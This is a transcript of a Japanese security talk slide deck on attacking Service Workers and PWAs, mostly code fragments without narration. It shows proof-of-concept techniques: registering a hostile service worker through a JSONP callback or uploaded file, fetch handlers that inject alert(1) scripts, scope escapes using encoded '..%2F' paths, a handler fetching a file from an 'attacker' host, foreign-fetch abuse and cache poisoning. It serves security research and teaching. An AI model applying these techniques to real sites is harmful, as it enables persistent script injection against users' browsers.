攻撃者視点で見る Service Worker / PWA Study SW

Transcript

1. None
2. None

3. • •

4. • • • <script> navigator.serviceWorker.register("/sw.js") </script>

5. • • •

6. • • https://html5experts.jp/kyo_ago/5153/ https://speakerdeck.com/filedescriptor/exploiting-the-unexploitable-with-lesser-known-browser-tricks?slide=23

7. None

8. HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 [...] alert(1)//({});

9. <script> navigator.serviceWorker.register("/jsonp?callback=[SW_HERE]//"); </script> HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 [...]

   onfetch=event=>console.log('fetch')//({});

10. <script> var formData = new FormData(); formData.append("csrf_token", "secret"); var sw

    = "/* [SW_CODE] */"; var blob = new Blob([sw], { type: "text/javascript"}); formData.append("file", blob, "sw.js"); fetch("/upload", {method: "POST", body: formData}) .then(/* Register SW */); </script>

11. • •

12. • • onfetch=e=>{ body = '<script>alert(1)</script>'; init = {headers: {'content-type':

    'text/html'}}; e.respondWith(new Response(body,init)); }

13. • • • <script> navigator.serviceWorker.register("/sw.js", {scope: "/"}) </script>

14. • • "/assets/js/sw.js", {scope: "https://other.example.com/"} "/assets/js/sw.js", {scope: "/assets/"} "/assets/js/sw.js", {scope:

    "/assets/css/"} "/assets/js/sw.js", {scope: "/assets/js/"} "/assets/js/sw.js", {scope: "/assets/js/sub/"}

15. HTTP/1.1 200 OK content-type: text/javascript service-worker-allowed: / [...]

16. https://example.com/api/jsonp https://example.com/api%2Fjsonp

17. ❝ ❞

18. https://example.com/out-of-scope/ https://example.com/foo/..%2Fout-of-scope%2F

19. None

20. • • •

21. onfetch=e=>{ e.respondWith(fetch("//attacker/poc.swf")) } •

22. <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="example.jp" /> </cross-domain-policy> https://github.com/cure53/XSSChallengeWiki/wiki/XSSMas-Challenge-2016

23. ❝ ❞

24. <script src="//example.com/socialbutton.js"></script>

25. self.addEventListener('install', e => { e.registerForeignFetch({ scopes: ['/'], origins: ['*']// });

    }); onforeignfetch = e => { e.respondWith(fetch(e.request).then(res => ({ response: new Response('alert(1)')// }))) }

26. • •

27. onfetch = event => { event.respondWith( caches.open("v1").then(function(cache) { return cache.match(event.request).then(function(response)

    { if (response) { return response;// } else { return fetch(event.request.clone()).then(function(response) { cache.put(event.request, response.clone());// return response; }); } }) }) ); };

28. <script> caches.open("v1").then(function(cache){ content = "<script>alert(1)</script>"; init = {headers: {"content-type": "text/html"}};

    request = new Request("poison.html"); response = new Response(content, init); cache.put(request, response); }) </script>

29. <script> document.write(localStorage.getItem('name')); </script>

30. • • •

31. • • HTTP/1.1 200 OK Content-Type:text/html Clear-Site-Data: "storage"

32. GET https://example.com/sw.js HTTP/1.1 Host: example.com Connection: keep-alive Pragma: no-cache Cache-Control:

    no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: */* Service-Worker: script Referer: https://example.com/ Accept-Encoding: gzip, deflate, br Accept-Language: ja,en;q=0.8,en-US;q=0.6

33. • •

34. None
35. None